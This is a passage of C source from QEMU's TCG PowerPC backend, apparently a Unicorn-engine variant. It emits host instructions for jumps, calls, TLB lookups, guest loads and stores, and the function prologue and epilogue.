the new value of TCG_REG_TB. But this does still happen quite often. */ if (tb_diff == (int16_t)tb_diff) { i1 = ADDI | TAI(TCG_REG_TB, TCG_REG_TB, tb_diff); i2 = B | (br_diff & 0x3fffffc); } else { intptr_t lo = (int16_t)tb_diff; intptr_t hi = (int32_t)(tb_diff - lo); assert(tb_diff == hi + lo); i1 = ADDIS | TAI(TCG_REG_TB, TCG_REG_TB, hi >> 16); i2 = ADDI | TAI(TCG_REG_TB, TCG_REG_TB, lo); } #ifdef HOST_WORDS_BIGENDIAN pair = (uint64_t)i1 << 32 | i2; #else pair = (uint64_t)i2 << 32 | i1; #endif /* As per the enclosing if, this is ppc64. Avoid the _Static_assert within atomic_set that would fail to build a ppc32 host. */ atomic_set__nocheck((uint64_t *)jmp_addr, pair); flush_icache_range(jmp_addr, jmp_addr + 8); } else { intptr_t diff = addr - jmp_addr; tcg_debug_assert(in_range_b(diff)); atomic_set((uint32_t *)jmp_addr, B | (diff & 0x3fffffc)); flush_icache_range(jmp_addr, jmp_addr + 4); } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *target) { #ifdef _CALL_AIX /* Look through the descriptor. If the branch is in range, and we don't have to spend too much effort on building the toc. */ void *tgt = ((void **)target)[0]; uintptr_t toc = ((uintptr_t *)target)[1]; intptr_t diff = tcg_pcrel_diff(s, tgt); if (in_range_b(diff) && toc == (uint32_t)toc) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, toc); tcg_out_b(s, LK, tgt); } else { /* Fold the low bits of the constant into the addresses below. */ intptr_t arg = (intptr_t)target; int ofs = (int16_t)arg; if (ofs + 8 < 0x8000) { arg -= ofs; } else { ofs = 0; } tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, arg); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_TMP1, ofs); tcg_out32(s, MTSPR | RA(TCG_REG_R0) | CTR); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_REG_TMP1, ofs + SZP); tcg_out32(s, BCCTR | BO_ALWAYS | LK); } #elif defined(_CALL_ELF) && _CALL_ELF == 2 intptr_t diff; /* In the ELFv2 ABI, we have to set up r12 to contain the destination address, which the callee uses to compute its TOC address. */ /* FIXME: when the branch is in range, we could avoid r12 load if we knew that the destination uses the same TOC, and what its local entry point offset is. 
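       (Background note: an ELFv2 function has a global entry point,
       which computes its TOC pointer from r12, and a local entry
       point a few instructions later for callers known to share the
       TOC; the distance between the two is encoded in the symbol's
       st_other field.)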
*/ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R12, (intptr_t)target); diff = tcg_pcrel_diff(s, target); if (in_range_b(diff)) { tcg_out_b(s, LK, target); } else { tcg_out32(s, MTSPR | RS(TCG_REG_R12) | CTR); tcg_out32(s, BCCTR | BO_ALWAYS | LK); } #else tcg_out_b(s, LK, target); #endif } static const uint32_t qemu_ldx_opc[16] = { [MO_UB] = LBZX, [MO_UW] = LHZX, [MO_UL] = LWZX, [MO_Q] = LDX, [MO_SW] = LHAX, [MO_SL] = LWAX, [MO_BSWAP | MO_UB] = LBZX, [MO_BSWAP | MO_UW] = LHBRX, [MO_BSWAP | MO_UL] = LWBRX, [MO_BSWAP | MO_Q] = LDBRX, }; static const uint32_t qemu_stx_opc[16] = { [MO_UB] = STBX, [MO_UW] = STHX, [MO_UL] = STWX, [MO_Q] = STDX, [MO_BSWAP | MO_UB] = STBX, [MO_BSWAP | MO_UW] = STHBRX, [MO_BSWAP | MO_UL] = STWBRX, [MO_BSWAP | MO_Q] = STDBRX, }; static const uint32_t qemu_exts_opc[4] = { EXTSB, EXTSH, EXTSW, 0 }; #if defined (CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" /* helper signature: helper_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* We expect to use a 16-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -32768); /* Perform the TLB load and compare. Places the result of the comparison in CR7, loads the addend of the TLB into R3, and returns the register containing the guest address (zero-extended into R4). Clobbers R0 and R2. */ static TCGReg tcg_out_tlb_read(TCGContext *s, MemOp opc, TCGReg addrlo, TCGReg addrhi, int mem_index, bool is_read) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int cmp_off = (is_read ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R4, TCG_AREG0, table_off); /* Extract the page index, shifted into place for tlb index. */ if (TCG_TARGET_REG_BITS == 32) { tcg_out_shri32(s, TCG_REG_TMP1, addrlo, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); } else { tcg_out_shri64(s, TCG_REG_TMP1, addrlo, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); } tcg_out32(s, AND | SAB(TCG_REG_R3, TCG_REG_R3, TCG_REG_TMP1)); /* Load the TLB comparator. */ if (cmp_off == 0 && TCG_TARGET_REG_BITS >= TARGET_LONG_BITS) { uint32_t lxu = (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32 ? 
LWZUX : LDUX); tcg_out32(s, lxu | TAB(TCG_REG_TMP1, TCG_REG_R3, TCG_REG_R4)); } else { tcg_out32(s, ADD | TAB(TCG_REG_R3, TCG_REG_R3, TCG_REG_R4)); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_TMP1, TCG_REG_R3, cmp_off + 4); tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R4, TCG_REG_R3, cmp_off); } else { tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP1, TCG_REG_R3, cmp_off); } } /* Load the TLB addend for use on the fast path. Do this asap to minimize any load use delay. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_REG_R3, offsetof(CPUTLBEntry, addend)); /* Clear the non-page, non-alignment bits from the address */ if (TCG_TARGET_REG_BITS == 32) { /* We don't support unaligned accesses on 32-bits. * Preserve the bottom bits and thus trigger a comparison * failure on unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } tcg_out_rlw(s, RLWINM, TCG_REG_R0, addrlo, 0, (32 - a_bits) & 31, 31 - TARGET_PAGE_BITS); } else { TCGReg t = addrlo; /* If the access is unaligned, we need to make sure we fail if we * cross a page boundary. The trick is to add the access size-1 * to the address before masking the low bits. That will make the * address overflow to the next page if we cross a page boundary, * which will then force a mismatch of the TLB compare. */ if (a_bits < s_bits) { unsigned a_mask = (1 << a_bits) - 1; unsigned s_mask = (1 << s_bits) - 1; tcg_out32(s, ADDI | TAI(TCG_REG_R0, t, s_mask - a_mask)); t = TCG_REG_R0; } /* Mask the address for the requested alignment. */ if (TARGET_LONG_BITS == 32) { tcg_out_rlw(s, RLWINM, TCG_REG_R0, t, 0, (32 - a_bits) & 31, 31 - TARGET_PAGE_BITS); /* Zero-extend the address for use in the final address. */ tcg_out_ext32u(s, TCG_REG_R4, addrlo); addrlo = TCG_REG_R4; } else if (a_bits == 0) { tcg_out_rld(s, RLDICR, TCG_REG_R0, t, 0, 63 - TARGET_PAGE_BITS); } else { tcg_out_rld(s, RLDICL, TCG_REG_R0, t, 64 - TARGET_PAGE_BITS, TARGET_PAGE_BITS - a_bits); tcg_out_rld(s, RLDICL, TCG_REG_R0, TCG_REG_R0, TARGET_PAGE_BITS, 0); } } if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, 0, 7, TCG_TYPE_I32); tcg_out_cmp(s, TCG_COND_EQ, addrhi, TCG_REG_R4, 0, 6, TCG_TYPE_I32); tcg_out32(s, CRAND | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); } else { tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, 0, 7, TCG_TYPE_TL); } return addrlo; } /* Record the context of a call to the out of line helper code for the slow path for a load or store, so that we can later generate the correct helper code. 
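   (Explanatory note: the fast path leaves a conditional branch-and-link
   at label_ptr[0]; the slow path patches that branch to reach it,
   re-marshals the call arguments from the registers recorded here,
   calls the helper, and branches back to raddr.)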
*/ static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg datalo_reg, TCGReg datahi_reg, TCGReg addrlo_reg, TCGReg addrhi_reg, tcg_insn_unit *raddr, tcg_insn_unit *lptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = datalo_reg; label->datahi_reg = datahi_reg; label->addrlo_reg = addrlo_reg; label->addrhi_reg = addrhi_reg; label->raddr = raddr; label->label_ptr[0] = lptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); TCGReg hi, lo, arg = TCG_REG_R3; if (!reloc_pc14(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); lo = lb->addrlo_reg; hi = lb->addrhi_reg; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); } else { /* If the address needed to be zero-extended, we'll have already placed it in R4. The only remaining case is 64-bit guest. */ tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); } tcg_out_movi(s, TCG_TYPE_I32, arg++, oi); tcg_out32(s, MFSPR | RT(arg) | LR); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]); lo = lb->datalo_reg; hi = lb->datahi_reg; if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) { tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_REG_R4); tcg_out_mov(s, TCG_TYPE_I32, hi, TCG_REG_R3); } else if (opc & MO_SIGN) { uint32_t insn = qemu_exts_opc[opc & MO_SIZE]; tcg_out32(s, insn | RA(lo) | RS(TCG_REG_R3)); } else { tcg_out_mov(s, TCG_TYPE_REG, lo, TCG_REG_R3); } tcg_out_b(s, 0, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; TCGReg hi, lo, arg = TCG_REG_R3; if (!reloc_pc14(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); lo = lb->addrlo_reg; hi = lb->addrhi_reg; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); } else { /* If the address needed to be zero-extended, we'll have already placed it in R4. The only remaining case is 64-bit guest. */ tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); } lo = lb->datalo_reg; hi = lb->datahi_reg; if (TCG_TARGET_REG_BITS == 32) { switch (s_bits) { case MO_64: #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); /* FALLTHRU */ case MO_32: tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); break; default: tcg_out_rlw(s, RLWINM, arg++, lo, 0, 32 - (8 << s_bits), 31); break; } } else { if (s_bits == MO_64) { tcg_out_mov(s, TCG_TYPE_I64, arg++, lo); } else { tcg_out_rld(s, RLDICL, arg++, lo, 0, 64 - (8 << s_bits)); } } tcg_out_movi(s, TCG_TYPE_I32, arg++, oi); tcg_out32(s, MFSPR | RT(arg) | LR); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tcg_out_b(s, 0, lb->raddr); return true; } #endif /* SOFTMMU */ static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg datalo, datahi, addrlo, rbase; TCGReg addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc, s_bits; #ifdef CONFIG_SOFTMMU int mem_index; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addrlo = *args++; addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? 
*args++ : 0); oi = *args++; opc = get_memop(oi); s_bits = opc & MO_SIZE; #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addrlo = tcg_out_tlb_read(s, opc, addrlo, addrhi, mem_index, true); /* Load a pointer into the current opcode w/conditional branch-link. */ label_ptr = s->code_ptr; tcg_out32(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); rbase = TCG_REG_R3; #else /* !CONFIG_SOFTMMU */ rbase = guest_base ? TCG_GUEST_BASE_REG : 0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); addrlo = TCG_REG_TMP1; } #endif if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { if (opc & MO_BSWAP) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); tcg_out32(s, LWBRX | TAB(datahi, rbase, TCG_REG_R0)); } else if (rbase != 0) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWZX | TAB(datahi, rbase, addrlo)); tcg_out32(s, LWZX | TAB(datalo, rbase, TCG_REG_R0)); } else if (addrlo == datahi) { tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); } else { tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); } } else { uint32_t insn = qemu_ldx_opc[opc & (MO_BSWAP | MO_SSIZE)]; if (!have_isa_2_06 && insn == LDBRX) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); tcg_out32(s, LWBRX | TAB(TCG_REG_R0, rbase, TCG_REG_R0)); tcg_out_rld(s, RLDIMI, datalo, TCG_REG_R0, 32, 0); } else if (insn) { tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); } else { insn = qemu_ldx_opc[opc & (MO_SIZE | MO_BSWAP)]; tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); insn = qemu_exts_opc[s_bits]; tcg_out32(s, insn | RA(datalo) | RS(datalo)); } } #ifdef CONFIG_SOFTMMU add_qemu_ldst_label(s, true, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #endif } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg datalo, datahi, addrlo, rbase; TCGReg addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc, s_bits; #ifdef CONFIG_SOFTMMU int mem_index; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addrlo = *args++; addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); s_bits = opc & MO_SIZE; #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addrlo = tcg_out_tlb_read(s, opc, addrlo, addrhi, mem_index, false); /* Load a pointer into the current opcode w/conditional branch-link. */ label_ptr = s->code_ptr; tcg_out32(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); rbase = TCG_REG_R3; #else /* !CONFIG_SOFTMMU */ rbase = guest_base ? 
TCG_GUEST_BASE_REG : 0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); addrlo = TCG_REG_TMP1; } #endif if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { if (opc & MO_BSWAP) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); tcg_out32(s, STWBRX | SAB(datahi, rbase, TCG_REG_R0)); } else if (rbase != 0) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, STWX | SAB(datahi, rbase, addrlo)); tcg_out32(s, STWX | SAB(datalo, rbase, TCG_REG_R0)); } else { tcg_out32(s, STW | TAI(datahi, addrlo, 0)); tcg_out32(s, STW | TAI(datalo, addrlo, 4)); } } else { uint32_t insn = qemu_stx_opc[opc & (MO_BSWAP | MO_SIZE)]; if (!have_isa_2_06 && insn == STDBRX) { tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, addrlo, 4)); tcg_out_shri64(s, TCG_REG_R0, datalo, 32); tcg_out32(s, STWBRX | SAB(TCG_REG_R0, rbase, TCG_REG_TMP1)); } else { tcg_out32(s, insn | SAB(datalo, rbase, addrlo)); } } #ifdef CONFIG_SOFTMMU add_qemu_ldst_label(s, false, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #endif } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { int i; for (i = 0; i < count; ++i) { p[i] = NOP; } } /* Parameters for function call generation, used in tcg.c. */ #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_EXTEND_ARGS 1 #ifdef _CALL_AIX # define LINK_AREA_SIZE (6 * SZR) # define LR_OFFSET (1 * SZR) # define TCG_TARGET_CALL_STACK_OFFSET (LINK_AREA_SIZE + 8 * SZR) #elif defined(TCG_TARGET_CALL_DARWIN) # define LINK_AREA_SIZE (6 * SZR) # define LR_OFFSET (2 * SZR) #elif TCG_TARGET_REG_BITS == 64 # if defined(_CALL_ELF) && _CALL_ELF == 2 # define LINK_AREA_SIZE (4 * SZR) # define LR_OFFSET (1 * SZR) # endif #else /* TCG_TARGET_REG_BITS == 32 */ # if defined(_CALL_SYSV) # define LINK_AREA_SIZE (2 * SZR) # define LR_OFFSET (1 * SZR) # endif #endif #ifndef LR_OFFSET # error "Unhandled abi" #endif #ifndef TCG_TARGET_CALL_STACK_OFFSET # define TCG_TARGET_CALL_STACK_OFFSET LINK_AREA_SIZE #endif #define CPU_TEMP_BUF_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define REG_SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * SZR) #define FRAME_SIZE ((TCG_TARGET_CALL_STACK_OFFSET \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_SIZE \ + REG_SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define REG_SAVE_BOT (FRAME_SIZE - REG_SAVE_SIZE) static void tcg_target_qemu_prologue(TCGContext *s) { int i; #ifdef _CALL_AIX void **desc = (void **)s->code_ptr; desc[0] = desc + 2; /* entry point */ desc[1] = 0; /* environment pointer */ s->code_ptr = (void *)(desc + 2); /* skip over descriptor */ #endif tcg_set_frame(s, TCG_REG_CALL_STACK, REG_SAVE_BOT - CPU_TEMP_BUF_SIZE, CPU_TEMP_BUF_SIZE); /* Prologue */ tcg_out32(s, MFSPR | RT(TCG_REG_R0) | LR); tcg_out32(s, (SZR == 8 ? 
STDU : STWU) | SAI(TCG_REG_R1, TCG_REG_R1, -FRAME_SIZE));

    for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) {
        tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i],
                   TCG_REG_R1, REG_SAVE_BOT + i * SZR);
    }
    tcg_out_st(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET);

#ifndef CONFIG_SOFTMMU
    if (guest_base) {
        tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true);
        tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG);
    }
#endif

    tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]);
    tcg_out32(s, MTSPR | RS(tcg_target_call_iarg_regs[1]) | CTR);
    if (USE_REG_TB) {
        tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, tcg_target_call_iarg_regs[1]);
    }
    tcg_out32(s, BCCTR | BO_ALWAYS);

    /* Epilogue */
    s->code_gen_epilogue = tb_ret_addr = s->code_ptr;

    tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_R1, FRAME_SIZE+LR_OFFSET);
    for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); ++i) {
        tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i],
                   TCG_REG_R1, REG_SAVE_BOT + i * SZR);
    }
    tcg_out32(s, MTSPR | RS(TCG_REG_R0) | LR);
    tcg_out32(s, ADDI | TAI(TCG_REG_R1, TCG_REG_R1, FRAME_SIZE));
    tcg_out32(s, BCLR | BO_ALWAYS);
}

static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args,
                       const int *const_args)
{
    TCGArg a0, a1, a2;
    int c;

    switch (opc) {
    case INDEX_op_exit_tb:
        tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R3, args[0]);
        tcg_out_b(s, 0, tb_ret_addr);
        break;
    case INDEX_op_goto_tb:
        if (s->tb_jmp_insn_offset) {
            /* Direct jump. */
            if (TCG_TARGET_REG_BITS == 64) {
                /* Ensure the next insns are 8-byte aligned. */
                if ((uintptr_t)s->code_ptr & 7) {
                    tcg_out32(s, NOP);
                }
                s->tb_jmp_insn_offset[args[0]] = tcg_current_code_size(s);
                tcg_out32(s, ADDIS | TAI(TCG_REG_TB, TCG_REG_TB, 0));
                tcg_out32(s, ADDI | TAI(TCG_REG_TB, TCG_REG_TB, 0));
            } else {
                s->tb_jmp_insn_offset[args[0]] = tcg_current_code_size(s);
                tcg_out32(s, B);
                s->tb_jmp_reset_offset[args[0]] = tcg_current_code_size(s);
                break;
            }
        } else {
            /* Indirect jump. */
            tcg_debug_assert(s->tb_jmp_insn_offset == NULL);
            tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TB, 0,
                       (intptr_t)(s->tb_jmp_target_addr + args[0]));
        }
        tcg_out32(s, MTSPR | RS(TCG_REG_TB) | CTR);
        tcg_out32(s, BCCTR | BO_ALWAYS);
        set_jmp_reset_offset(s, args[0]);
        if (USE_REG_TB) {
            /* For the unlinked case, need to reset TCG_REG_TB.
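               (Explanatory note: when the TB is unlinked, the patched
               goto_tb branch lands here with TCG_REG_TB holding the
               address of this reset point, so subtracting the number
               of bytes emitted so far rewinds it to the start of the
               TB.)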
*/ c = -tcg_current_code_size(s); assert(c == (int16_t)c); tcg_out32(s, ADDI | TAI(TCG_REG_TB, TCG_REG_TB, c)); } break; case INDEX_op_goto_ptr: tcg_out32(s, MTSPR | RS(args[0]) | CTR); if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, args[0]); } tcg_out32(s, ADDI | TAI(TCG_REG_R3, 0, 0)); tcg_out32(s, BCCTR | BO_ALWAYS); break; case INDEX_op_br: { TCGLabel *l = arg_label(args[0]); uint32_t insn = B; if (l->has_value) { insn |= reloc_pc24_val(s->code_ptr, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_PPC_REL24, l, 0); } tcg_out32(s, insn); } break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); break; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: tcg_out_mem_long(s, LBZ, LBZX, args[0], args[1], args[2]); tcg_out32(s, EXTSB | RS(args[0]) | RA(args[0])); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_mem_long(s, LHZ, LHZX, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: tcg_out_mem_long(s, LHA, LHAX, args[0], args[1], args[2]); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_mem_long(s, LWZ, LWZX, args[0], args[1], args[2]); break; case INDEX_op_ld32s_i64: tcg_out_mem_long(s, LWA, LWAX, args[0], args[1], args[2]); break; case INDEX_op_ld_i64: tcg_out_mem_long(s, LD, LDX, args[0], args[1], args[2]); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_mem_long(s, STB, STBX, args[0], args[1], args[2]); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_mem_long(s, STH, STHX, args[0], args[1], args[2]); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_mem_long(s, STW, STWX, args[0], args[1], args[2]); break; case INDEX_op_st_i64: tcg_out_mem_long(s, STD, STDX, args[0], args[1], args[2]); break; case INDEX_op_add_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_32: tcg_out_mem_long(s, ADDI, ADD, a0, a1, (int32_t)a2); } else { tcg_out32(s, ADD | TAB(a0, a1, a2)); } break; case INDEX_op_sub_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_I32, a0, a1 - a2); } else { tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); } } else if (const_args[2]) { a2 = -a2; goto do_addi_32; } else { tcg_out32(s, SUBF | TAB(a0, a2, a1)); } break; case INDEX_op_and_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi32(s, a0, a1, a2); } else { tcg_out32(s, AND | SAB(a1, a0, a2)); } break; case INDEX_op_and_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi64(s, a0, a1, a2); } else { tcg_out32(s, AND | SAB(a1, a0, a2)); } break; case INDEX_op_or_i64: case INDEX_op_or_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_ori32(s, a0, a1, a2); } else { tcg_out32(s, OR | SAB(a1, a0, a2)); } break; case INDEX_op_xor_i64: case INDEX_op_xor_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_xori32(s, a0, a1, a2); } else { tcg_out32(s, XOR | SAB(a1, a0, a2)); } break; case INDEX_op_andc_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi32(s, a0, a1, ~a2); } else { tcg_out32(s, ANDC | SAB(a1, a0, a2)); } break; case INDEX_op_andc_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_andi64(s, a0, a1, ~a2); } else { tcg_out32(s, ANDC | SAB(a1, a0, a2)); } break; case INDEX_op_orc_i32: if (const_args[2]) { tcg_out_ori32(s, args[0], args[1], ~args[2]); break; } /* FALLTHRU */ case INDEX_op_orc_i64: tcg_out32(s, ORC 
| SAB(args[1], args[0], args[2])); break; case INDEX_op_eqv_i32: if (const_args[2]) { tcg_out_xori32(s, args[0], args[1], ~args[2]); break; } /* FALLTHRU */ case INDEX_op_eqv_i64: tcg_out32(s, EQV | SAB(args[1], args[0], args[2])); break; case INDEX_op_nand_i32: case INDEX_op_nand_i64: tcg_out32(s, NAND | SAB(args[1], args[0], args[2])); break; case INDEX_op_nor_i32: case INDEX_op_nor_i64: tcg_out32(s, NOR | SAB(args[1], args[0], args[2])); break; case INDEX_op_clz_i32: tcg_out_cntxz(s, TCG_TYPE_I32, CNTLZW, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctz_i32: tcg_out_cntxz(s, TCG_TYPE_I32, CNTTZW, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctpop_i32: tcg_out32(s, CNTPOPW | SAB(args[1], args[0], 0)); break; case INDEX_op_clz_i64: tcg_out_cntxz(s, TCG_TYPE_I64, CNTLZD, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctz_i64: tcg_out_cntxz(s, 